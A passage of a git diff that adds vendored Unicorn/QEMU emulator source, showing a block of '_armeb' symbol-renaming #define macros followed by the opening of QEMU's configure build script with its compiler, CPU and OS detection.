tb_check_watchpoint_armeb +#define tb_find_fast tb_find_fast_armeb +#define tb_find_pc tb_find_pc_armeb +#define tb_find_slow tb_find_slow_armeb +#define tb_flush tb_flush_armeb +#define tb_flush_jmp_cache tb_flush_jmp_cache_armeb +#define tb_free tb_free_armeb +#define tb_gen_code tb_gen_code_armeb +#define tb_hash_remove tb_hash_remove_armeb +#define tb_invalidate_phys_addr tb_invalidate_phys_addr_armeb +#define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_armeb +#define tb_invalidate_phys_range tb_invalidate_phys_range_armeb +#define tb_jmp_cache_hash_func tb_jmp_cache_hash_func_armeb +#define tb_jmp_cache_hash_page tb_jmp_cache_hash_page_armeb +#define tb_jmp_remove tb_jmp_remove_armeb +#define tb_link_page tb_link_page_armeb +#define tb_page_remove tb_page_remove_armeb +#define tb_phys_hash_func tb_phys_hash_func_armeb +#define tb_phys_invalidate tb_phys_invalidate_armeb +#define tb_reset_jump tb_reset_jump_armeb +#define tb_set_jmp_target tb_set_jmp_target_armeb +#define tcg_accel_class_init tcg_accel_class_init_armeb +#define tcg_accel_type tcg_accel_type_armeb +#define tcg_add_param_i32 tcg_add_param_i32_armeb +#define tcg_add_param_i64 tcg_add_param_i64_armeb +#define tcg_add_target_add_op_defs tcg_add_target_add_op_defs_armeb +#define tcg_allowed tcg_allowed_armeb +#define tcg_canonicalize_memop tcg_canonicalize_memop_armeb +#define tcg_commit tcg_commit_armeb +#define tcg_cond_to_jcc tcg_cond_to_jcc_armeb +#define tcg_constant_folding tcg_constant_folding_armeb +#define tcg_const_i32 tcg_const_i32_armeb +#define tcg_const_i64 tcg_const_i64_armeb +#define tcg_const_local_i32 tcg_const_local_i32_armeb +#define tcg_const_local_i64 tcg_const_local_i64_armeb +#define tcg_context_init tcg_context_init_armeb +#define tcg_cpu_address_space_init tcg_cpu_address_space_init_armeb +#define tcg_cpu_exec tcg_cpu_exec_armeb +#define tcg_current_code_size tcg_current_code_size_armeb +#define tcg_dump_info tcg_dump_info_armeb +#define tcg_dump_ops tcg_dump_ops_armeb +#define tcg_exec_all tcg_exec_all_armeb +#define tcg_find_helper tcg_find_helper_armeb +#define tcg_func_start tcg_func_start_armeb +#define tcg_gen_abs_i32 tcg_gen_abs_i32_armeb +#define tcg_gen_add2_i32 tcg_gen_add2_i32_armeb +#define tcg_gen_add_i32 tcg_gen_add_i32_armeb +#define tcg_gen_add_i64 tcg_gen_add_i64_armeb +#define tcg_gen_addi_i32 tcg_gen_addi_i32_armeb +#define tcg_gen_addi_i64 tcg_gen_addi_i64_armeb +#define tcg_gen_andc_i32 tcg_gen_andc_i32_armeb +#define tcg_gen_and_i32 tcg_gen_and_i32_armeb +#define tcg_gen_and_i64 tcg_gen_and_i64_armeb +#define tcg_gen_andi_i32 tcg_gen_andi_i32_armeb +#define tcg_gen_andi_i64 tcg_gen_andi_i64_armeb +#define tcg_gen_br tcg_gen_br_armeb +#define tcg_gen_brcond_i32 tcg_gen_brcond_i32_armeb +#define tcg_gen_brcond_i64 tcg_gen_brcond_i64_armeb +#define tcg_gen_brcondi_i32 tcg_gen_brcondi_i32_armeb +#define tcg_gen_bswap16_i32 tcg_gen_bswap16_i32_armeb +#define tcg_gen_bswap32_i32 tcg_gen_bswap32_i32_armeb +#define tcg_gen_callN tcg_gen_callN_armeb +#define tcg_gen_code tcg_gen_code_armeb +#define tcg_gen_code_common tcg_gen_code_common_armeb +#define tcg_gen_code_search_pc tcg_gen_code_search_pc_armeb +#define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_armeb +#define tcg_gen_debug_insn_start tcg_gen_debug_insn_start_armeb +#define tcg_gen_deposit_i32 tcg_gen_deposit_i32_armeb +#define tcg_gen_exit_tb tcg_gen_exit_tb_armeb +#define tcg_gen_ext16s_i32 tcg_gen_ext16s_i32_armeb +#define tcg_gen_ext16u_i32 tcg_gen_ext16u_i32_armeb +#define tcg_gen_ext32s_i64 tcg_gen_ext32s_i64_armeb +#define tcg_gen_ext32u_i64 tcg_gen_ext32u_i64_armeb +#define tcg_gen_ext8s_i32 tcg_gen_ext8s_i32_armeb +#define tcg_gen_ext8u_i32 tcg_gen_ext8u_i32_armeb +#define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_armeb +#define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_armeb +#define tcg_gen_goto_tb tcg_gen_goto_tb_armeb +#define tcg_gen_ld_i32 tcg_gen_ld_i32_armeb +#define tcg_gen_ld_i64 tcg_gen_ld_i64_armeb +#define tcg_gen_ldst_op_i32 tcg_gen_ldst_op_i32_armeb +#define tcg_gen_ldst_op_i64 tcg_gen_ldst_op_i64_armeb +#define tcg_gen_movcond_i32 tcg_gen_movcond_i32_armeb +#define tcg_gen_movcond_i64 tcg_gen_movcond_i64_armeb +#define tcg_gen_mov_i32 tcg_gen_mov_i32_armeb +#define tcg_gen_mov_i64 tcg_gen_mov_i64_armeb +#define tcg_gen_movi_i32 tcg_gen_movi_i32_armeb +#define tcg_gen_movi_i64 tcg_gen_movi_i64_armeb +#define tcg_gen_mul_i32 tcg_gen_mul_i32_armeb +#define tcg_gen_muls2_i32 tcg_gen_muls2_i32_armeb +#define tcg_gen_mulu2_i32 tcg_gen_mulu2_i32_armeb +#define tcg_gen_neg_i32 tcg_gen_neg_i32_armeb +#define tcg_gen_neg_i64 tcg_gen_neg_i64_armeb +#define tcg_gen_not_i32 tcg_gen_not_i32_armeb +#define tcg_gen_op0 tcg_gen_op0_armeb +#define tcg_gen_op1i tcg_gen_op1i_armeb +#define tcg_gen_op2_i32 tcg_gen_op2_i32_armeb +#define tcg_gen_op2_i64 tcg_gen_op2_i64_armeb +#define tcg_gen_op2i_i32 tcg_gen_op2i_i32_armeb +#define tcg_gen_op2i_i64 tcg_gen_op2i_i64_armeb +#define tcg_gen_op3_i32 tcg_gen_op3_i32_armeb +#define tcg_gen_op3_i64 tcg_gen_op3_i64_armeb +#define tcg_gen_op4_i32 tcg_gen_op4_i32_armeb +#define tcg_gen_op4i_i32 tcg_gen_op4i_i32_armeb +#define tcg_gen_op4ii_i32 tcg_gen_op4ii_i32_armeb +#define tcg_gen_op4ii_i64 tcg_gen_op4ii_i64_armeb +#define tcg_gen_op5ii_i32 tcg_gen_op5ii_i32_armeb +#define tcg_gen_op6_i32 tcg_gen_op6_i32_armeb +#define tcg_gen_op6i_i32 tcg_gen_op6i_i32_armeb +#define tcg_gen_op6i_i64 tcg_gen_op6i_i64_armeb +#define tcg_gen_orc_i32 tcg_gen_orc_i32_armeb +#define tcg_gen_or_i32 tcg_gen_or_i32_armeb +#define tcg_gen_or_i64 tcg_gen_or_i64_armeb +#define tcg_gen_ori_i32 tcg_gen_ori_i32_armeb +#define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_armeb +#define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_armeb +#define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_armeb +#define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_armeb +#define tcg_gen_rotl_i32 tcg_gen_rotl_i32_armeb +#define tcg_gen_rotli_i32 tcg_gen_rotli_i32_armeb +#define tcg_gen_rotr_i32 tcg_gen_rotr_i32_armeb +#define tcg_gen_rotri_i32 tcg_gen_rotri_i32_armeb +#define tcg_gen_sar_i32 tcg_gen_sar_i32_armeb +#define tcg_gen_sari_i32 tcg_gen_sari_i32_armeb +#define tcg_gen_setcond_i32 tcg_gen_setcond_i32_armeb +#define tcg_gen_shl_i32 tcg_gen_shl_i32_armeb +#define tcg_gen_shl_i64 tcg_gen_shl_i64_armeb +#define tcg_gen_shli_i32 tcg_gen_shli_i32_armeb +#define tcg_gen_shli_i64 tcg_gen_shli_i64_armeb +#define tcg_gen_shr_i32 tcg_gen_shr_i32_armeb +#define tcg_gen_shifti_i64 tcg_gen_shifti_i64_armeb +#define tcg_gen_shr_i64 tcg_gen_shr_i64_armeb +#define tcg_gen_shri_i32 tcg_gen_shri_i32_armeb +#define tcg_gen_shri_i64 tcg_gen_shri_i64_armeb +#define tcg_gen_st_i32 tcg_gen_st_i32_armeb +#define tcg_gen_st_i64 tcg_gen_st_i64_armeb +#define tcg_gen_sub_i32 tcg_gen_sub_i32_armeb +#define tcg_gen_sub_i64 tcg_gen_sub_i64_armeb +#define tcg_gen_subi_i32 tcg_gen_subi_i32_armeb +#define tcg_gen_trunc_i64_i32 tcg_gen_trunc_i64_i32_armeb +#define tcg_gen_trunc_shr_i64_i32 tcg_gen_trunc_shr_i64_i32_armeb +#define tcg_gen_xor_i32 tcg_gen_xor_i32_armeb +#define tcg_gen_xor_i64 tcg_gen_xor_i64_armeb +#define tcg_gen_xori_i32 tcg_gen_xori_i32_armeb +#define tcg_get_arg_str_i32 tcg_get_arg_str_i32_armeb +#define tcg_get_arg_str_i64 tcg_get_arg_str_i64_armeb +#define tcg_get_arg_str_idx tcg_get_arg_str_idx_armeb +#define tcg_global_mem_new_i32 tcg_global_mem_new_i32_armeb +#define tcg_global_mem_new_i64 tcg_global_mem_new_i64_armeb +#define tcg_global_mem_new_internal tcg_global_mem_new_internal_armeb +#define tcg_global_reg_new_i32 tcg_global_reg_new_i32_armeb +#define tcg_global_reg_new_i64 tcg_global_reg_new_i64_armeb +#define tcg_global_reg_new_internal tcg_global_reg_new_internal_armeb +#define tcg_handle_interrupt tcg_handle_interrupt_armeb +#define tcg_init tcg_init_armeb +#define tcg_invert_cond tcg_invert_cond_armeb +#define tcg_la_bb_end tcg_la_bb_end_armeb +#define tcg_la_br_end tcg_la_br_end_armeb +#define tcg_la_func_end tcg_la_func_end_armeb +#define tcg_liveness_analysis tcg_liveness_analysis_armeb +#define tcg_malloc tcg_malloc_armeb +#define tcg_malloc_internal tcg_malloc_internal_armeb +#define tcg_op_defs_org tcg_op_defs_org_armeb +#define tcg_opt_gen_mov tcg_opt_gen_mov_armeb +#define tcg_opt_gen_movi tcg_opt_gen_movi_armeb +#define tcg_optimize tcg_optimize_armeb +#define tcg_out16 tcg_out16_armeb +#define tcg_out32 tcg_out32_armeb +#define tcg_out64 tcg_out64_armeb +#define tcg_out8 tcg_out8_armeb +#define tcg_out_addi tcg_out_addi_armeb +#define tcg_out_branch tcg_out_branch_armeb +#define tcg_out_brcond32 tcg_out_brcond32_armeb +#define tcg_out_brcond64 tcg_out_brcond64_armeb +#define tcg_out_bswap32 tcg_out_bswap32_armeb +#define tcg_out_bswap64 tcg_out_bswap64_armeb +#define tcg_out_call tcg_out_call_armeb +#define tcg_out_cmp tcg_out_cmp_armeb +#define tcg_out_ext16s tcg_out_ext16s_armeb +#define tcg_out_ext16u tcg_out_ext16u_armeb +#define tcg_out_ext32s tcg_out_ext32s_armeb +#define tcg_out_ext32u tcg_out_ext32u_armeb +#define tcg_out_ext8s tcg_out_ext8s_armeb +#define tcg_out_ext8u tcg_out_ext8u_armeb +#define tcg_out_jmp tcg_out_jmp_armeb +#define tcg_out_jxx tcg_out_jxx_armeb +#define tcg_out_label tcg_out_label_armeb +#define tcg_out_ld tcg_out_ld_armeb +#define tcg_out_modrm tcg_out_modrm_armeb +#define tcg_out_modrm_offset tcg_out_modrm_offset_armeb +#define tcg_out_modrm_sib_offset tcg_out_modrm_sib_offset_armeb +#define tcg_out_mov tcg_out_mov_armeb +#define tcg_out_movcond32 tcg_out_movcond32_armeb +#define tcg_out_movcond64 tcg_out_movcond64_armeb +#define tcg_out_movi tcg_out_movi_armeb +#define tcg_out_op tcg_out_op_armeb +#define tcg_out_pop tcg_out_pop_armeb +#define tcg_out_push tcg_out_push_armeb +#define tcg_out_qemu_ld tcg_out_qemu_ld_armeb +#define tcg_out_qemu_ld_direct tcg_out_qemu_ld_direct_armeb +#define tcg_out_qemu_ld_slow_path tcg_out_qemu_ld_slow_path_armeb +#define tcg_out_qemu_st tcg_out_qemu_st_armeb +#define tcg_out_qemu_st_direct tcg_out_qemu_st_direct_armeb +#define tcg_out_qemu_st_slow_path tcg_out_qemu_st_slow_path_armeb +#define tcg_out_reloc tcg_out_reloc_armeb +#define tcg_out_rolw_8 tcg_out_rolw_8_armeb +#define tcg_out_setcond32 tcg_out_setcond32_armeb +#define tcg_out_setcond64 tcg_out_setcond64_armeb +#define tcg_out_shifti tcg_out_shifti_armeb +#define tcg_out_st tcg_out_st_armeb +#define tcg_out_tb_finalize tcg_out_tb_finalize_armeb +#define tcg_out_tb_init tcg_out_tb_init_armeb +#define tcg_out_tlb_load tcg_out_tlb_load_armeb +#define tcg_out_vex_modrm tcg_out_vex_modrm_armeb +#define tcg_patch32 tcg_patch32_armeb +#define tcg_patch8 tcg_patch8_armeb +#define tcg_pcrel_diff tcg_pcrel_diff_armeb +#define tcg_pool_reset tcg_pool_reset_armeb +#define tcg_prologue_init tcg_prologue_init_armeb +#define tcg_ptr_byte_diff tcg_ptr_byte_diff_armeb +#define tcg_reg_alloc tcg_reg_alloc_armeb +#define tcg_reg_alloc_bb_end tcg_reg_alloc_bb_end_armeb +#define tcg_reg_alloc_call tcg_reg_alloc_call_armeb +#define tcg_reg_alloc_mov tcg_reg_alloc_mov_armeb +#define tcg_reg_alloc_movi tcg_reg_alloc_movi_armeb +#define tcg_reg_alloc_op tcg_reg_alloc_op_armeb +#define tcg_reg_alloc_start tcg_reg_alloc_start_armeb +#define tcg_reg_free tcg_reg_free_armeb +#define tcg_reg_sync tcg_reg_sync_armeb +#define tcg_set_frame tcg_set_frame_armeb +#define tcg_set_nop tcg_set_nop_armeb +#define tcg_swap_cond tcg_swap_cond_armeb +#define tcg_target_callee_save_regs tcg_target_callee_save_regs_armeb +#define tcg_target_call_iarg_regs tcg_target_call_iarg_regs_armeb +#define tcg_target_call_oarg_regs tcg_target_call_oarg_regs_armeb +#define tcg_target_const_match tcg_target_const_match_armeb +#define tcg_target_init tcg_target_init_armeb +#define tcg_target_qemu_prologue tcg_target_qemu_prologue_armeb +#define tcg_target_reg_alloc_order tcg_target_reg_alloc_order_armeb +#define tcg_temp_alloc tcg_temp_alloc_armeb +#define tcg_temp_free_i32 tcg_temp_free_i32_armeb +#define tcg_temp_free_i64 tcg_temp_free_i64_armeb +#define tcg_temp_free_internal tcg_temp_free_internal_armeb +#define tcg_temp_local_new_i32 tcg_temp_local_new_i32_armeb +#define tcg_temp_local_new_i64 tcg_temp_local_new_i64_armeb +#define tcg_temp_new_i32 tcg_temp_new_i32_armeb +#define tcg_temp_new_i64 tcg_temp_new_i64_armeb +#define tcg_temp_new_internal tcg_temp_new_internal_armeb +#define tcg_temp_new_internal_i32 tcg_temp_new_internal_i32_armeb +#define tcg_temp_new_internal_i64 tcg_temp_new_internal_i64_armeb +#define tdb_hash tdb_hash_armeb +#define teecr_write teecr_write_armeb +#define teehbr_access teehbr_access_armeb +#define temp_allocate_frame temp_allocate_frame_armeb +#define temp_dead temp_dead_armeb +#define temps_are_copies temps_are_copies_armeb +#define temp_save temp_save_armeb +#define temp_sync temp_sync_armeb +#define tgen_arithi tgen_arithi_armeb +#define tgen_arithr tgen_arithr_armeb +#define thumb2_logic_op thumb2_logic_op_armeb +#define ti925t_initfn ti925t_initfn_armeb +#define tlb_add_large_page tlb_add_large_page_armeb +#define tlb_flush_entry tlb_flush_entry_armeb +#define tlbi_aa64_asid_is_write tlbi_aa64_asid_is_write_armeb +#define tlbi_aa64_asid_write tlbi_aa64_asid_write_armeb +#define tlbi_aa64_vaa_is_write tlbi_aa64_vaa_is_write_armeb +#define tlbi_aa64_vaa_write tlbi_aa64_vaa_write_armeb +#define tlbi_aa64_va_is_write tlbi_aa64_va_is_write_armeb +#define tlbi_aa64_va_write tlbi_aa64_va_write_armeb +#define tlbiall_is_write tlbiall_is_write_armeb +#define tlbiall_write tlbiall_write_armeb +#define tlbiasid_is_write tlbiasid_is_write_armeb +#define tlbiasid_write tlbiasid_write_armeb +#define tlbimvaa_is_write tlbimvaa_is_write_armeb +#define tlbimvaa_write tlbimvaa_write_armeb +#define tlbimva_is_write tlbimva_is_write_armeb +#define tlbimva_write tlbimva_write_armeb +#define tlb_is_dirty_ram tlb_is_dirty_ram_armeb +#define tlb_protect_code tlb_protect_code_armeb +#define tlb_reset_dirty_range tlb_reset_dirty_range_armeb +#define tlb_reset_dirty_range_all tlb_reset_dirty_range_all_armeb +#define tlb_set_dirty tlb_set_dirty_armeb +#define tlb_set_dirty1 tlb_set_dirty1_armeb +#define tlb_unprotect_code_phys tlb_unprotect_code_phys_armeb +#define tlb_vaddr_to_host tlb_vaddr_to_host_armeb +#define token_get_type token_get_type_armeb +#define token_get_value token_get_value_armeb +#define token_is_escape token_is_escape_armeb +#define token_is_keyword token_is_keyword_armeb +#define token_is_operator token_is_operator_armeb +#define tokens_append_from_iter tokens_append_from_iter_armeb +#define to_qiv to_qiv_armeb +#define to_qov to_qov_armeb +#define tosa_init tosa_init_armeb +#define tosa_machine_init tosa_machine_init_armeb +#define tswap32 tswap32_armeb +#define tswap64 tswap64_armeb +#define type_class_get_size type_class_get_size_armeb +#define type_get_by_name type_get_by_name_armeb +#define type_get_parent type_get_parent_armeb +#define type_has_parent type_has_parent_armeb +#define type_initialize type_initialize_armeb +#define type_initialize_interface type_initialize_interface_armeb +#define type_is_ancestor type_is_ancestor_armeb +#define type_new type_new_armeb +#define type_object_get_size type_object_get_size_armeb +#define type_register_internal type_register_internal_armeb +#define type_table_add type_table_add_armeb +#define type_table_get type_table_get_armeb +#define type_table_lookup type_table_lookup_armeb +#define uint16_to_float32 uint16_to_float32_armeb +#define uint16_to_float64 uint16_to_float64_armeb +#define uint32_to_float32 uint32_to_float32_armeb +#define uint32_to_float64 uint32_to_float64_armeb +#define uint64_to_float128 uint64_to_float128_armeb +#define uint64_to_float32 uint64_to_float32_armeb +#define uint64_to_float64 uint64_to_float64_armeb +#define unassigned_io_ops unassigned_io_ops_armeb +#define unassigned_io_read unassigned_io_read_armeb +#define unassigned_io_write unassigned_io_write_armeb +#define unassigned_mem_accepts unassigned_mem_accepts_armeb +#define unassigned_mem_ops unassigned_mem_ops_armeb +#define unassigned_mem_read unassigned_mem_read_armeb +#define unassigned_mem_write unassigned_mem_write_armeb +#define update_spsel update_spsel_armeb +#define v6_cp_reginfo v6_cp_reginfo_armeb +#define v6k_cp_reginfo v6k_cp_reginfo_armeb +#define v7_cp_reginfo v7_cp_reginfo_armeb +#define v7mp_cp_reginfo v7mp_cp_reginfo_armeb +#define v7m_pop v7m_pop_armeb +#define v7m_push v7m_push_armeb +#define v8_cp_reginfo v8_cp_reginfo_armeb +#define v8_el2_cp_reginfo v8_el2_cp_reginfo_armeb +#define v8_el3_cp_reginfo v8_el3_cp_reginfo_armeb +#define v8_el3_no_el2_cp_reginfo v8_el3_no_el2_cp_reginfo_armeb +#define vapa_cp_reginfo vapa_cp_reginfo_armeb +#define vbar_write vbar_write_armeb +#define vfp_exceptbits_from_host vfp_exceptbits_from_host_armeb +#define vfp_exceptbits_to_host vfp_exceptbits_to_host_armeb +#define vfp_get_fpcr vfp_get_fpcr_armeb +#define vfp_get_fpscr vfp_get_fpscr_armeb +#define vfp_get_fpsr vfp_get_fpsr_armeb +#define vfp_reg_offset vfp_reg_offset_armeb +#define vfp_set_fpcr vfp_set_fpcr_armeb +#define vfp_set_fpscr vfp_set_fpscr_armeb +#define vfp_set_fpsr vfp_set_fpsr_armeb +#define visit_end_implicit_struct visit_end_implicit_struct_armeb +#define visit_end_list visit_end_list_armeb +#define visit_end_struct visit_end_struct_armeb +#define visit_end_union visit_end_union_armeb +#define visit_get_next_type visit_get_next_type_armeb +#define visit_next_list visit_next_list_armeb +#define visit_optional visit_optional_armeb +#define visit_start_implicit_struct visit_start_implicit_struct_armeb +#define visit_start_list visit_start_list_armeb +#define visit_start_struct visit_start_struct_armeb +#define visit_start_union visit_start_union_armeb +#define vmsa_cp_reginfo vmsa_cp_reginfo_armeb +#define vmsa_tcr_el1_write vmsa_tcr_el1_write_armeb +#define vmsa_ttbcr_raw_write vmsa_ttbcr_raw_write_armeb +#define vmsa_ttbcr_reset vmsa_ttbcr_reset_armeb +#define vmsa_ttbcr_write vmsa_ttbcr_write_armeb +#define vmsa_ttbr_write vmsa_ttbr_write_armeb +#define write_cpustate_to_list write_cpustate_to_list_armeb +#define write_list_to_cpustate write_list_to_cpustate_armeb +#define write_raw_cp_reg write_raw_cp_reg_armeb +#define X86CPURegister32_lookup X86CPURegister32_lookup_armeb +#define x86_op_defs x86_op_defs_armeb +#define xpsr_read xpsr_read_armeb +#define xpsr_write xpsr_write_armeb +#define xscale_cpar_write xscale_cpar_write_armeb +#define xscale_cp_reginfo xscale_cp_reginfo_armeb +#define ARM_REGS_STORAGE_SIZE ARM_REGS_STORAGE_SIZE_armeb +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/configure b/ai_anti_malware/unicorn/unicorn-master/qemu/configure new file mode 100644 index 0000000..b5d52d7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/configure @@ -0,0 +1,1364 @@ +#!/bin/sh +# +# qemu configure script (c) 2003 Fabrice Bellard +# + +# Unset some variables known to interfere with behavior of common tools, +# just as autoconf does. +CLICOLOR_FORCE= GREP_OPTIONS= +unset CLICOLOR_FORCE GREP_OPTIONS + +# Temporary directory used for files created while +# configure runs. Since it is in the build directory +# we can safely blow away any previous version of it +# (and we need not jump through hoops to try to delete +# it when configure exits.) +TMPDIR1="config-temp" +rm -rf "${TMPDIR1}" +mkdir -p "${TMPDIR1}" +if [ $? -ne 0 ]; then + echo "ERROR: failed to create temporary directory" + exit 1 +fi + +TMPB="qemu-conf" +TMPC="${TMPDIR1}/${TMPB}.c" +TMPO="${TMPDIR1}/${TMPB}.o" +TMPE="${TMPDIR1}/${TMPB}.exe" + +rm -f config.log + +# Print a helpful header at the top of config.log +echo "# QEMU configure log $(date)" >> config.log +printf "# Configured with:" >> config.log +printf " '%s'" "$0" "$@" >> config.log +echo >> config.log +echo "#" >> config.log + +error_exit() { + echo + echo "ERROR: $1" + while test -n "$2"; do + echo " $2" + shift + done + echo + exit 1 +} + +do_compiler() { + # Run the compiler, capturing its output to the log. First argument + # is compiler binary to execute. + local compiler="$1" + shift + echo $compiler "$@" >> config.log + $compiler "$@" >> config.log 2>&1 || return $? + # Test passed. If this is an --enable-werror build, rerun + # the test with -Werror and bail out if it fails. This + # makes warning-generating-errors in configure test code + # obvious to developers. + if test "$werror" != "yes"; then + return 0 + fi + # Don't bother rerunning the compile if we were already using -Werror + case "$*" in + *-Werror*) + return 0 + ;; + esac + echo $compiler -Werror "$@" >> config.log + $compiler -Werror "$@" >> config.log 2>&1 && return $? + error_exit "configure test passed without -Werror but failed with -Werror." \ + "This is probably a bug in the configure script. The failing command" \ + "will be at the bottom of config.log." \ + "You can run configure with --disable-werror to bypass this check." +} + +do_cc() { + do_compiler "$cc" "$@" +} + +compile_object() { + do_cc $QEMU_CFLAGS -c -o $TMPO $TMPC +} + +compile_prog() { + local_cflags="$1" + local_ldflags="$2" + do_cc $QEMU_CFLAGS $local_cflags -o $TMPE $TMPC $LDFLAGS $local_ldflags +} + +# symbolically link $1 to $2. Portable version of "ln -sf". +symlink() { + rm -rf "$2" + mkdir -p "$(dirname "$2")" + ln -s "$1" "$2" +} + +# check whether a command is available to this shell (may be either an +# executable or a builtin) +has() { + type "$1" >/dev/null 2>&1 +} + +# search for an executable in PATH +path_of() { + local_command="$1" + local_ifs="$IFS" + local_dir="" + + # pathname has a dir component? + if [ "${local_command#*/}" != "$local_command" ]; then + if [ -x "$local_command" ] && [ ! -d "$local_command" ]; then + echo "$local_command" + return 0 + fi + fi + if [ -z "$local_command" ]; then + return 1 + fi + + IFS=: + for local_dir in $PATH; do + if [ -x "$local_dir/$local_command" ] && [ ! -d "$local_dir/$local_command" ]; then + echo "$local_dir/$local_command" + IFS="${local_ifs:-$(printf ' \t\n')}" + return 0 + fi + done + # not found + IFS="${local_ifs:-$(printf ' \t\n')}" + return 1 +} + +# default parameters +source_path=`dirname "$0"` +cpu="" +static="no" +cross_prefix="" +host_cc="cc" +cc_i386=i386-pc-linux-gnu-gcc +debug_info="yes" +stack_protector="" + +# Don't accept a target_list environment variable. +unset target_list + +# Default value for a variable defining feature "foo". +# * foo="no" feature will only be used if --enable-foo arg is given +# * foo="" feature will be searched for, and if found, will be used +# unless --disable-foo is given +# * foo="yes" this value will only be set by --enable-foo flag. +# feature will searched for, +# if not found, configure exits with error +# +# Always add --enable-foo and --disable-foo command line args. +# Distributions want to ensure that several features are compiled in, and it +# is impossible without a --enable-foo that exits if a feature is not found. + +debug_tcg="no" +debug="no" +strip_opt="yes" +bigendian="no" +mingw32="no" +EXESUF="" +DSOSUF=".so" +LDFLAGS_SHARED="-shared" +bsd="no" +linux="no" +solaris="no" +softmmu="yes" +aix="no" +pie="" + +# parse CC options first +for opt do + optarg=`expr "x$opt" : 'x[^=]*=\(.*\)'` + case "$opt" in + --cc=*) CC="$optarg" + ;; + --source-path=*) source_path="$optarg" + ;; + --cpu=*) cpu="$optarg" + ;; + --extra-cflags=*) QEMU_CFLAGS="$optarg $QEMU_CFLAGS" + EXTRA_CFLAGS="$optarg" + ;; + --extra-ldflags=*) LDFLAGS="$optarg $LDFLAGS" + EXTRA_LDFLAGS="$optarg" + ;; + --enable-debug-info) debug_info="yes" + ;; + --disable-debug-info) debug_info="no" + ;; + esac +done +# OS specific +# Using uname is really, really broken. Once we have the right set of checks +# we can eliminate its usage altogether. + +# Preferred compiler: +# ${CC} (if set) +# ${cross_prefix}gcc (if cross-prefix specified) +# system compiler +if test -z "${CC}${cross_prefix}"; then + cc="$host_cc" +else + cc="${CC-${cross_prefix}gcc}" +fi + +ar="${AR-${cross_prefix}ar}" +as="${AS-${cross_prefix}as}" +cpp="${CPP-$cc -E}" +objcopy="${OBJCOPY-${cross_prefix}objcopy}" +ld="${LD-${cross_prefix}ld}" +nm="${NM-${cross_prefix}nm}" +strip="${STRIP-${cross_prefix}strip}" + +# If the user hasn't specified ARFLAGS, default to 'rv', just as make does. +ARFLAGS="${ARFLAGS-rv}" + +# default flags for all hosts +QEMU_CFLAGS="-fno-strict-aliasing -fno-common $QEMU_CFLAGS" +QEMU_CFLAGS="-Wall -Wundef -Wwrite-strings -Wmissing-prototypes $QEMU_CFLAGS" +QEMU_CFLAGS="-Wstrict-prototypes -Wredundant-decls $QEMU_CFLAGS" +QEMU_CFLAGS="-D_GNU_SOURCE -D_FILE_OFFSET_BITS=64 -D_LARGEFILE_SOURCE $QEMU_CFLAGS" +QEMU_INCLUDES="-I. -I\$(SRC_PATH) -I\$(SRC_PATH)/include" +if test "$debug_info" = "yes"; then + CFLAGS="-g $CFLAGS" + LDFLAGS="-g $LDFLAGS" +else + CFLAGS="-O3 $CFLAGS" + LDFLAGS="-O3 $LDFLAGS" +fi + +# make source path absolute +source_path=`cd "$source_path"; pwd` + +# running configure in the source tree? +# we know that's the case if configure is there. +if test -f "./configure"; then + pwd_is_source_path="y" +else + pwd_is_source_path="n" +fi + +check_define() { +cat > $TMPC <<EOF +#if !defined($1) +#error $1 not defined +#endif +int main(void) { return 0; } +EOF + compile_object +} + +if check_define __linux__ ; then + targetos="Linux" +elif check_define _WIN32 ; then + targetos='MINGW32' +elif check_define __OpenBSD__ ; then + targetos='OpenBSD' +elif check_define __sun__ ; then + targetos='SunOS' +elif check_define __HAIKU__ ; then + targetos='Haiku' +else + targetos=`uname -s` +fi + +# Some host OSes need non-standard checks for which CPU to use. +# Note that these checks are broken for cross-compilation: if you're +# cross-compiling to one of these OSes then you'll need to specify +# the correct CPU with the --cpu option. +case $targetos in +Darwin) + # on Leopard most of the system is 32-bit, so we have to ask the kernel if we can + # run 64-bit userspace code. + # If the user didn't specify a CPU explicitly and the kernel says this is + # 64 bit hw, then assume x86_64. Otherwise fall through to the usual detection code. + if test -z "$cpu" && test "$(sysctl -n hw.optional.x86_64)" = "1"; then + cpu="x86_64" + fi + ;; +SunOS) + # `uname -m` returns i86pc even on an x86_64 box, so default based on isainfo + if test -z "$cpu" && test "$(isainfo -k)" = "amd64"; then + cpu="x86_64" + fi +esac + +if test ! -z "$cpu" ; then + # command line argument + : +elif check_define __i386__ ; then + cpu="i386" +elif check_define __x86_64__ ; then + if check_define __ILP32__ ; then + cpu="x32" + else + cpu="x86_64" + fi +elif check_define __sparc__ ; then + if check_define __arch64__ ; then + cpu="sparc64" + else + cpu="sparc" + fi +elif check_define _ARCH_PPC ; then + if check_define _ARCH_PPC64 ; then + cpu="ppc64" + else + cpu="ppc" + fi +elif check_define __mips__ ; then + cpu="mips" +elif check_define __ia64__ ; then + cpu="ia64" +elif check_define __s390__ ; then + if check_define __s390x__ ; then + cpu="s390x" + else + cpu="s390" + fi +elif check_define __arm__ ; then + cpu="arm" +elif check_define __aarch64__ ; then + cpu="aarch64" +elif check_define __hppa__ ; then + cpu="hppa" +else + cpu=`uname -m` +fi + +ARCH= +# Normalise host CPU name and set ARCH. +# Note that this case should only have supported host CPUs, not guests. +case "$cpu" in + ia64|ppc|ppc64|s390|s390x|sparc64|x32) + cpu="$cpu" + ;; + i386|i486|i586|i686|i86pc|BePC) + cpu="i386" + ;; + x86_64|amd64) + cpu="x86_64" + ;; + armv*b|armv*l|arm) + cpu="arm" + ;; + aarch64|aarch64eb) + cpu="aarch64" + ;; + mips*) + cpu="mips" + ;; + sparc|sun4[cdmuv]) + cpu="sparc" + ;; + *) + # This will result in either an error or falling back to TCI later + ARCH=unknown + ;; +esac +if test -z "$ARCH"; then + ARCH="$cpu" +fi + +# OS specific + +case $targetos in +CYGWIN*) + linux="yes" +;; +MINGW32*) + mingw32="yes" +;; +GNU/kFreeBSD) + bsd="yes" +;; +FreeBSD) + 